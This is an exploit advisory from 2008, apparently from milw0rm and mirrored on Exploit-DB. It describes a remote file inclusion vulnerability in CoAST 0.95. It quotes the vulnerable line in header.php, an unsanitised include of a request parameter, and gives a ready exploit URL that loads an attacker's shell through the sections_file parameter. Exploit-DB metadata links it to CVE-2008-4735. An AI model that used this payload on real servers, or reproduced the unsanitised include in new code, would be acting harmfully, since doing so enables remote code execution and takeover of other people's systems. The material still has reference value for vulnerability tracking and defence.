************************************************************************************** Author : By DaRkLiFe Greetz : str0ke & S.VV.A.T. ************************************************************************************** Script : The Concord Asset, Software, and Ticket system(CoAST) 0.95 Remote File Inclusion Vulnerability Download :http://downloads.sourceforge.net/coastal/coast-0.95.tgz?modtime=1222363198&big_mirror=0 ************************************************************************************** Exploit : Site.com/script_path/coast/header.php?sections_file=Shellz? ************************************************************************************** The header.php.dist file exists and it has to be renamed into header.php as given in instructions. Vulberable : line 201 : <?php @include $sections_file; ?> ************************************************************************************** THANKS ! GREETZ ! ************************************************************************************** # milw0rm.com [2008-09-27]
Related Exploits
Trying to match CVEs (1): CVE-2008-4735Trying to match OSVDBs (1): 48614
Trying to match setup file: 8023edb5b97113abd28855d05fca09a4
Other Possible E-DB Search Terms: CoAST 0.95, CoAST
Date | D | V | Title | Author | No matches |
---|